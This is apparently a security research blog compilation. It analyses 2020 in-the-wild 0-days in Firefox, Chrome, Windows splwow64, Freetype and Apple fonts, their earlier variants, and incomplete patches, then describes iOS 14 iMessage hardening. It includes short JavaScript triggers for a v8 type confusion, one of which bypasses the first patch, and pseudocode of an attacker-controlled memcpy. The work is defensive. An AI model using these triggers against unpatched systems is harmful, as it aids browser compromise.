CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the content process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. (The StreamControl must be the Parent, which lives in the browser process, in order to get the use-after-free in the browser process; the Child would only provide a use-after-free in the renderer.) The mId member of the CacheStreamControlParent is then subsequently accessed, causing the use-after-free.

The execution path for CVE-2020-6820 is:

StreamList::CloseAll  <- Patched function

  CacheStreamControlParent::CloseAll

    CacheStreamControlParent::NotifyCloseAll

      StreamControl::CloseAllReadStreams

        For each stream: 

          ReadStream::Inner::CloseStream

            ReadStream::Inner::Close

              ReadStream::Inner::NoteClosed

               

                StreamControl::NoteClosed

                  StreamControl::ForgetReadStream              

                    CacheStreamControlParent/Child::NoteClosedAfterForget

                      CacheStreamControlParent::RecvNoteClosed

                        StreamList::NoteClosed

                          If StreamList is empty && mStreamControl:

                           CacheStreamControlParent::Shutdown

                             Send__delete(this)  <- FREED HERE!

    PCacheStreamControlParent::SendCloseAll  <- Used here in call to Id()

CVE-2020-6820 is a variant of an internally found Mozilla vulnerability, Bug 1507180. 1507180 was discovered in November 2018 and patched in December 2019. 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, an explanatory comment for why the December 2019 patch was needed was added in early March 2020.

For 1507180, the execution path was the same as for CVE-2020-6820, except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls “higher” in StreamList::CloseAll.

Personally, I have doubts about whether this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [1, 2]) has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our in-the-wild tracking spreadsheet and is thus included in this list.

Chrome for Android CVE-2020-6572

CVE-2020-6572 is a use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned a new value, which means the object it previously owned can be deleted, while a raw pointer into that originally referenced object isn't updated.

More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).

This vulnerability, which was exploited in-the-wild, was reported in April 2020. Seven months prior, in September 2019, Man Yue Mo of Semmle reported a very similar vulnerability, CVE-2019-13695. CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572; it’s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.

In addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The vulnerability is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is CVE-2019-5870. Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, “TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices”.

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This was noted in the issue tracker for CVE-2019-5870 and then brought up again after Man Yue Mo reported CVE-2019-13695.

Windows splwow64 CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and CVE-2019-0880, which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.

From this great write-up by ByteRaptors on CVE-2019-0880, the pseudocode that allows control of the memcpy is:

void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)

{

  ...

    if(*((BYTE*)(firstAddress + 0x4)) == 0x75){

      ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));

      if(memcpyDestinationAddress != NULL){

        ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));

        DWORD copySize = *((DWORD*)(firstAddress + 0x28));

        memcpy(memcpyDestinationAddress,sourceAddress,copySize);

      }

    }

...

}

The equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 became 0x6D) and the offsets of the controlled memcpy arguments changed.

void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)

{

  ...

    if(*((BYTE*)(msgSend + 0x4)) == 0x6D){

     ...

      ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));

      if(srcAddress != NULL){

        DWORD copySize = *((DWORD*)(msgSend + 0x40));

        if(copySize <= 0x1FFFE) {

          ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));

          memcpy(destAddress,srcAddress,copySize);

        }

      }

    }

...

}

In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, CVE-2020-15999. The vulnerability is a heap buffer overflow in the Load_SBit_Png function, triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers, which Freetype truncated to 16-bit integers. The truncated values were used to calculate the bitmap size, and the backing buffer was allocated to that size. However, the original 32-bit width and height values were used when reading the bitmap into its backing buffer, thus causing the buffer overflow.
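
To make the size mismatch concrete, here is a minimal sketch of the arithmetic in JavaScript. It is not Freetype code: `toUShort` is a hypothetical helper that mimics a C cast to an unsigned 16-bit type, and the header dimensions are made-up values chosen so that the truncation is easy to follow.

```javascript
// Sketch of the 32-bit -> 16-bit truncation described above (not Freetype code).
// toUShort is a hypothetical helper mimicking a C cast to an unsigned 16-bit type.
function toUShort(value) {
  return value & 0xFFFF;
}

// Hypothetical dimensions as read from a PNG header (32-bit fields).
const imgWidth = 0x10001; // 65537
const imgHeight = 4;

// The allocation is based on the truncated values, 4 bytes per BGRA pixel.
const allocWidth = toUShort(imgWidth);  // low 16 bits only
const allocRows = toUShort(imgHeight);
const allocatedBytes = allocRows * allocWidth * 4;

// The decoder then writes according to the original, untruncated dimensions.
const writtenBytes = imgHeight * imgWidth * 4;

console.log("allocated:", allocatedBytes, "written:", writtenBytes);
```

With these example values the buffer is sized for a 1-pixel-wide image while the decoder writes rows that are 65537 pixels wide, which is the mismatch behind the overflow.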

In November 2014, Project Zero team member Mateusz Jurczyk reported CVE-2014-9665 to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.
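
The 2014 overflow can be sketched in the same way. The snippet below assumes the size calculation is carried out in 32-bit arithmetic and uses `Math.imul`, which keeps only the low 32 bits of a product, to imitate that. The function names are hypothetical, and the dimensions are example values rather than ones taken from a real font.

```javascript
// Sketch of size = rows * pitch under 32-bit arithmetic (an assumption of this example).
// Math.imul multiplies two numbers and keeps only the low 32 bits of the result.
function bitmapSize32(rows, width) {
  const pitch = Math.imul(width, 4); // 4 bytes per BGRA pixel
  return Math.imul(rows, pitch);
}

// The kind of range check added for CVE-2014-9665, expressed as a predicate.
function tooLarge(rows, width) {
  return rows > 0x7FFF || width > 0x7FFF;
}

// Example dimensions whose true product is exactly 2^32.
const wrappedSize = bitmapSize32(0x8000, 0x8000);
const exactSize = 0x8000 * (0x8000 * 4); // JavaScript doubles hold this exactly

console.log("32-bit size:", wrappedSize, "exact size:", exactSize);
console.log("rejected by check:", tooLarge(0x8000, 0x8000));
```

In this example the 32-bit result wraps around to a tiny value even though the bitmap needs gigabytes, and the range check rejects the dimensions before the multiplication is reached.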

To patch CVE-2014-9665, Freetype added a check to the rows and width prior to calculating the size as shown below.

if ( populate_map_and_metrics )

    {

      FT_Long  size;

      metrics->width  = (FT_Int)imgWidth;

      metrics->height = (FT_Int)imgHeight;

      map->width      = metrics->width;

      map->rows       = metrics->height;

      map->pixel_mode = FT_PIXEL_MODE_BGRA;

      map->pitch      = map->width * 4;

      map->num_grays  = 256;

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

      size = map->rows * map->pitch; <- overflow size

      error = ft_glyphslot_alloc_bitmap( slot, size );

      if ( error )

        goto DestroyExit;

    }

To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_SBit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG.

     if ( populate_map_and_metrics )

     {

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

+

       metrics->width  = (FT_UShort)imgWidth;

       metrics->height = (FT_UShort)imgHeight;

       map->width      = metrics->width;

       map->rows       = metrics->height;

       map->pixel_mode = FT_PIXEL_MODE_BGRA;

       map->pitch      = map->width * 4;

       map->num_grays  = 256;

-      /* reject too large bitmaps similarly to the rasterizer */

-      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

-      {

-        error = FT_THROW( Array_Too_Large );

-        goto DestroyExit;

-      }

[...]

To summarize:

  • CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.
  • CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow.

Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that while it’s still a variant, it’s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

The CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The variant, CVE-2015-0993, was reported to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that the implementation did not validate or correctly handle a negative n, allowing the font to arbitrarily read and write on the native interpreter stack.

CVE-2020-27930, the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate or correctly handle negative values of n, leading to the same outcome of arbitrary stack read/write.
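
The common pattern in both bugs can be illustrated with a toy operand stack. This is only a sketch of the bug class, not Apple’s or Microsoft’s interpreter code: the `OperandStack` class and its method names are hypothetical, and the stack pointer is modeled as a simple array index.

```javascript
// Toy operand stack illustrating the bug class; all names here are hypothetical.
class OperandStack {
  constructor(capacity) {
    this.slots = new Array(capacity).fill(0);
    this.sp = 0; // index of the next free slot
  }

  push(value) {
    if (this.sp >= this.slots.length) throw new RangeError("stack overflow");
    this.slots[this.sp++] = value;
  }

  // Flawed pattern: n is trusted, so a negative n moves sp upward
  // instead of downward and past the end of the stack.
  popArgsUnchecked(n) {
    this.sp -= n;
    return this.sp;
  }

  // Validated variant: n must be a non-negative integer that does not
  // exceed the number of values currently on the stack.
  popArgsChecked(n) {
    if (!Number.isInteger(n) || n < 0 || n > this.sp) {
      throw new RangeError("invalid argument count: " + n);
    }
    this.sp -= n;
    return this.sp;
  }
}

const stack = new OperandStack(8);
stack.push(1);
stack.push(2);
const spAfterBadPop = stack.popArgsUnchecked(-100);
console.log("stack pointer after popping -100 arguments:", spAfterBadPop);
```

In a native interpreter, a stack pointer that ends up far outside the stack’s bounds like this turns every later push and pop into an out-of-bounds access, which is where the arbitrary read/write comes from.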

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

Product              Vulnerability that was exploited in-the-wild    2nd patch

Internet Explorer    CVE-2020-0674                                   CVE-2020-0968

Google Chrome        CVE-2019-13764*                                 CVE-2020-6383

Microsoft Windows    CVE-2020-0986                                   CVE-2020-17008/CVE-2021-1648

* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. The patch for the most recent of these, CVE-2020-0674, which was exploited in January 2020, still didn’t comprehensively fix all of the variants: Microsoft patched CVE-2020-0968 in April 2020. We show the trigger in the section above.

Google Chrome CVE-2019-13764

CVE-2019-13764 in Chrome is an interesting case. When it was patched in November 2019, it was not known to be exploited in-the-wild. Instead, it was reported by security researchers Soyeon Park and Wen Xu. Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “Chrome Infinity Bug”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8’s integer type is that it is not closed under addition meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13764. Note that this line will not show any observable crash effects, and the road to making this vulnerability exploitable is quite long. Check out this blog post if you’re interested!

for (var i = -Infinity; i < 0; i += Infinity) { }

The patch that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

var increment = -Infinity;

var k = 0;

// The initial loop value is 0 and the increment is -Infinity.

// This is permissible because 0 + -Infinity = -Infinity, an integer.

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    // Once the initial variable equals -Infinity (one loop through)

    // the increment is changed to +Infinity. -Infinity + +Infinity = NaN

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}
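
To see how the loop variable reaches NaN, the trigger can be instrumented to record the value of `i` at each evaluation of the loop condition. This is plain JavaScript arithmetic and says nothing about what v8’s optimizing compiler infers; `traceInductionVariable` is just a name chosen for this sketch.

```javascript
// Records the value of i each time the loop condition is evaluated.
// Same logic as the trigger above, restructured so the values can be collected.
function traceInductionVariable() {
  const values = [];
  let increment = -Infinity;
  let k = 0;
  for (let i = 0; ; i += increment) {
    values.push(i);
    if (!(i < 1)) break;          // same loop condition as the trigger
    if (i === -Infinity) {
      increment = +Infinity;      // the increment changes inside the loop body
    }
    if (++k > 10) break;
  }
  return values;
}

const values = traceInductionVariable();
console.log(values); // [ 0, -Infinity, NaN ]
```

Neither the initial value plus the initial increment (0 + -Infinity) nor any single addition visible at the loop header produces NaN, yet the variable becomes NaN on the second update, which is exactly the case the first patch did not anticipate.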

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. This incomplete fix was reported to Chrome in February 2020. The follow-up patch was more conservative: it bailed as soon as it detected that the increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”. Again, check out Sergei’s blog post if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry knows there is a detection gap in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days and we certainly don’t find them all in a timely manner.

Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After Kaspersky reported that CVE-2020-0986 was actively exploited as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only disclosed as exploited in-the-wild in August 2020.

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. This issue was reported to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.
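
The idea behind the more complete patch, that every copy must both read from and write into the message buffer, can be sketched as follows. This is a hypothetical illustration using a `Uint8Array` as the message buffer, not a reconstruction of Microsoft’s code; `rangeInsideBuffer` and `checkedCopy` are names invented for this example.

```javascript
// Hypothetical check: a range [offset, offset + size) must lie inside the buffer.
// Written as size <= bufferLength - offset to avoid relying on offset + size.
function rangeInsideBuffer(bufferLength, offset, size) {
  return Number.isInteger(offset) && Number.isInteger(size) &&
         offset >= 0 && size >= 0 &&
         offset <= bufferLength && size <= bufferLength - offset;
}

// Copies within the message only if both source and destination ranges
// stay inside it; otherwise the request is rejected.
function checkedCopy(message, srcOffset, dstOffset, size) {
  if (!rangeInsideBuffer(message.length, srcOffset, size) ||
      !rangeInsideBuffer(message.length, dstOffset, size)) {
    return false;
  }
  message.copyWithin(dstOffset, srcOffset, srcOffset + size);
  return true;
}

const message = new Uint8Array([1, 2, 3, 4, 0, 0, 0, 0]);
const okCopy = checkedCopy(message, 0, 4, 4);        // both ranges inside the buffer
const badCopy = checkedCopy(message, 4, 0, 0x1000);  // size runs past the end
console.log(okCopy, badCopy, Array.from(message));
```

Switching from raw pointers to offsets only helps if a check of this kind is applied to both ends of the copy, since an unchecked offset is just a pointer relative to a known base.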

Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. 

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our variant analysis to other vulnerabilities. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: my talk at BluehatIL 2020 and Ki Chan Ahn at OffensiveCon 2020.)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

A Look at iMessage in iOS 14

Posted By Samuel Groß, Project Zero

On December 20, Citizenlab published “The Great iPwn”, detailing how “Journalists [were] Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit”. Of particular interest is the following note: “We do not believe that [the exploit] works against iOS 14 and above, which includes new security protections”. Given that it is also now almost exactly one year since we published the Remote iPhone Exploitation blog post series, in which we described how an iMessage 0-click exploit can work in practice and gave a number of suggestions on how similar attacks could be prevented in the future, now seemed like a great time to dig into the security improvements in iOS 14 in more detail and explore how Apple has hardened their platform against 0-click attacks.

The content of this blog post is the result of a roughly one-week reverse engineering project, mostly performed on an M1 Mac Mini running macOS 11.1, with the results, where possible, verified to also apply to iOS 14.3, running on an iPhone XS. Due to the nature of this project and the limited timeframe, it is possible that I have missed some relevant changes or made mistakes interpreting some results. Where possible, I’ve tried to describe the steps necessary to verify the presented results, and would appreciate any corrections or additions.

The blog post will start with an overview of the major changes Apple implemented in iOS 14 which affect the security of iMessage. Afterwards, and mostly for the readers interested in the technical details, each of the major improvements is described in more detail while also providing a walkthrough of how it was reverse engineered. At least for the technical details, it is recommended to briefly review the blog post series from last year for a basic introduction to iMessage and the exploitation techniques used to attack it.

Overview

Memory corruption based 0-click exploits typically require at least the following pieces:

  1. A memory corruption vulnerability, reachable without user interaction and ideally without triggering any user notifications
  2. A way to break ASLR remotely
  3. A way to turn the vulnerability into remote code execution
  4. (Likely) A way to break out of any sandbox, typically by exploiting a separate vulnerability in another operating system component (e.g. a userspace service or the kernel)

With iOS 14, Apple shipped a significant refactoring of iMessage processing, and made all four parts of the attack harder. This is mainly due to three central changes:

1. The BlastDoor Service

One of the major changes in iOS 14 is the introduction of a new, tightly sandboxed “BlastDoor” service which is now responsible for almost all parsing of untrusted data in iMessages (for example, NSKeyedArchiver payloads). Furthermore, this service is written in Swift, a (mostly) memory safe language which makes it significantly harder to introduce classic memory corruption vulnerabilities into the code base.

The following diagram shows the rough new iMessage processing pipeline, with the name of the respective service process shown at the top of each box.

The iMessage processing pipeline in iOS 14 and macOS Big Sur. An iMessage arrives in apsd as a push notification from Apple’s servers. From there, it is first passed to identityservicesd, which decrypts its payload using the local iMessage private key, then to imagent. Imagent then delegates the majority of the parsing work to the BlastDoor service. Afterwards, if the iMessage contains any attachments, they are downloaded from iCloud servers by IMTransferAgent. If the iMessage contains plugin data (such as a URL with a preview image), the serialized plugin data is again processed by the BlastDoor service and a preview message is generated from it. Finally, IMDPersistenceAgent stores the iMessage into the messages database, triggers a user notification, and returns to imagent, which sends the delivery receipt to the iMessage servers and thus to the sender.

As can be seen, the majority of the processing of complex, untrusted data has been moved into the new BlastDoor service. Furthermore, this design with its 7+ involved services allows fine-grained sandboxing rules to be applied. For example, only the IMTransferAgent and apsd processes are required to perform network operations. As such, all services in this pipeline are now properly sandboxed (with the BlastDoor service arguably being sandboxed the strongest).

2. Re-randomization of the Dyld Shared Cache Region

Historically, ASLR on Apple’s platforms had one architectural weakness: the shared cache region, containing most of the system libraries in a single prelinked blob, was only randomized per boot, and so would stay at the same address across all processes. This turned out to be especially critical in the context of 0-click attacks, as it allowed an attacker, able to remotely observe process crashes (e.g. through timing of automatic delivery receipts), to infer the base address of the shared cache and as such break ASLR, a prerequisite for subsequent exploitation steps.

However, with iOS 14, Apple has added logic to specifically detect this kind of attack, in which case the shared cache is re-randomized for the targeted service the next time it is started, thus rendering this technique useless. This should make bypassing ASLR in a 0-click attack context significantly harder or even impossible (apart from brute force) depending on the concrete vulnerability.

3. Exponential Throttling to Slow Down Brute Force Attacks

To limit an attacker’s ability to retry exploits or brute force ASLR, the BlastDoor and imagent services are now subject to a newly introduced exponential throttling mechanism enforced by launchd, causing the interval between restarts after a crash to double with every subsequent crash (up to an apparent maximum of 20 minutes). With this change, an exploit that relied on repeatedly crashing the attacked service would now likely require in the order of multiple hours to roughly half a day to complete instead of a few minutes.
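
A quick back-of-the-envelope model shows why this changes the economics of a crash-based attack. The sketch below assumes the delay simply doubles per crash until it hits the 20 minute cap; the 10 second starting interval and the count of 40 crashes are assumptions made for this example only, and the function names are hypothetical.

```javascript
// Delay before the next restart after a given number of earlier crashes,
// assuming plain doubling with a cap (a simplified model of the throttling).
function restartDelaySeconds(priorCrashes, baseSeconds, maxSeconds) {
  return Math.min(baseSeconds * Math.pow(2, priorCrashes), maxSeconds);
}

// Total time spent waiting across a series of crashes.
function totalWaitSeconds(crashes, baseSeconds, maxSeconds) {
  let total = 0;
  for (let n = 0; n < crashes; n++) {
    total += restartDelaySeconds(n, baseSeconds, maxSeconds);
  }
  return total;
}

const BASE_SECONDS = 10;      // assumption for this example
const MAX_SECONDS = 20 * 60;  // the apparent 20 minute maximum
const CRASHES = 40;           // hypothetical number of crashes an exploit needs

const totalSeconds = totalWaitSeconds(CRASHES, BASE_SECONDS, MAX_SECONDS);
console.log("total wait:", totalSeconds, "s =", (totalSeconds / 3600).toFixed(2), "h");
```

Under these assumptions the cap is reached after only a handful of crashes, so the total is dominated by the 20 minute waits: 40 crashes already cost a bit over 11 hours.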

The remainder of this blog post will now look at each of these three changes in greater depth.

The BlastDoor Service

The new BlastDoor service and its role in the processing of iMessages can be studied by following the flow of an incoming iMessage. On the wire, a simple text iMessage would look something like this, encoded as binary plist:

{

    // Group UUID

    gid = "008412B9-A4F7-4B96-96C3-70C4276CB2BE";

    // Group protocol version

    gv = 8;

    // Chat participants

    p =     (

        "mailto:[email protected]",

        "mailto:[email protected]"

    );

    // Participants version

    pv = 0;

    // Message being replied to, usually the last message in the chat 

    r = "6401430E-CDD3-4BC7-A377-7611706B431F";

    // The plain text content

    t = "Hello World!";

    // Probably some other version number

    v = 1;

    // The rich text content    

    x = "<html><body>Hello World!</body></html>";  

}

As such, the minimal steps required to parse it are:

  1. If necessary, decompress the binary data
  2. Decode the plist from its binary serialization format
  3. Extract its various fields and ensure they have the correct type
  4. Decode the `x` key if present, using an XML decoder
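
Step 3 is the kind of work that is easy to get subtly wrong, so here is a small sketch of what strict field extraction could look like. It operates on an already decoded dictionary and is not based on Apple’s implementation: the expected types are inferred from the example message above, and treating every field as optional and dropping unknown keys are assumptions of this sketch.

```javascript
// Expected type per key, inferred from the example message above (an assumption).
const FIELD_TYPES = {
  gid: "string", gv: "number", p: "array", pv: "number",
  r: "string", t: "string", v: "number", x: "string",
};

function typeOf(value) {
  return Array.isArray(value) ? "array" : typeof value;
}

// Copies only known fields of the expected type; anything else is either
// dropped (unknown key) or rejected (known key with the wrong type).
function extractFields(dict) {
  const fields = {};
  for (const [key, expected] of Object.entries(FIELD_TYPES)) {
    if (!Object.prototype.hasOwnProperty.call(dict, key)) continue;
    const actual = typeOf(dict[key]);
    if (actual !== expected) {
      throw new TypeError("field " + key + ": expected " + expected + ", got " + actual);
    }
    fields[key] = dict[key];
  }
  return fields;
}

const parsed = extractFields({ t: "Hello World!", gv: 8, unexpected: 1 });
console.log(parsed); // only the known, correctly typed fields remain
```

The result is a plain object containing only vetted fields, which is the shape of data one would want to hand to less isolated code.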

Previously, all of this work happened in imagent. With iOS 14, however, it all moved into the new BlastDoor service. While the main processing flow still starts in imagent, which receives the raw but unencrypted payload bytes from identityservicesd (part of the IDS framework) in -[IMDiMessageIDSDelegate service:account:incomingTopLevelMessage:fromID:messageContext:], messages are then more or less immediately forwarded to the BlastDoor service through +[IMBlastdoor sendDictionary:withCompletionBlock:] which creates the reply handler block and then calls -[IMMessagesBlastDoorInterface diffuseTopLevelDictionary:resultHandler:]. At that point processing ends up in Swift code that deserializes the binary payload and sends it to the BlastDoor service over XPC.

Inside BlastDoor, the work mostly happens in BlastDoor.framework and MessagesBlastDoorService. As most of it is written in Swift, it is fairly unpleasant to statically reverse engineer (no symbols, many virtual calls, Swift runtime code sprinkled all over the place), but fortunately, that is also not really necessary for the purpose of this blog post. However, it is worth noting that while the high level control flow logic is written in Swift, some of the parsing steps still involve the existing Objective-C or C implementations. For example, XML is being parsed by libxml, and the NSKeyedArchiver payloads by the Objective-C implementation of NSKeyedUnarchiver.

The responses from BlastDoor can be seen by breaking on the reply handler function in imagent (the function can be found in +[IMBlastdoor sendDictionary:withCompletionBlock:] or by searching for XREFs to the string “Blastdoor response %p received (command: %hhu, guid: %@)” in IMDaemonCore.framework). A typical BlastDoor response for a simple text message is shown below:

(lldb) po $x2

TextMessage(

    metadata: BlastDoor.Metadata(

        messageGUID: D391CC96-9CC6-44C6-B827-1DEB0F252529,

        timestamp: Optional(1610108299117662350),

        wantsDeliveryReceipt: true,

        wantsCheckpointing: false,

        storageContext: BlastDoor.Metadata.StorageContext(

            isFromStorage: false, isLastFromStorage: false

        )

    ),

    messageSubType: MessageType.textMessage(BlastDoor.Message(

        plainTextBody: Optional("Hello World"),

        plainTextSubject: nil,

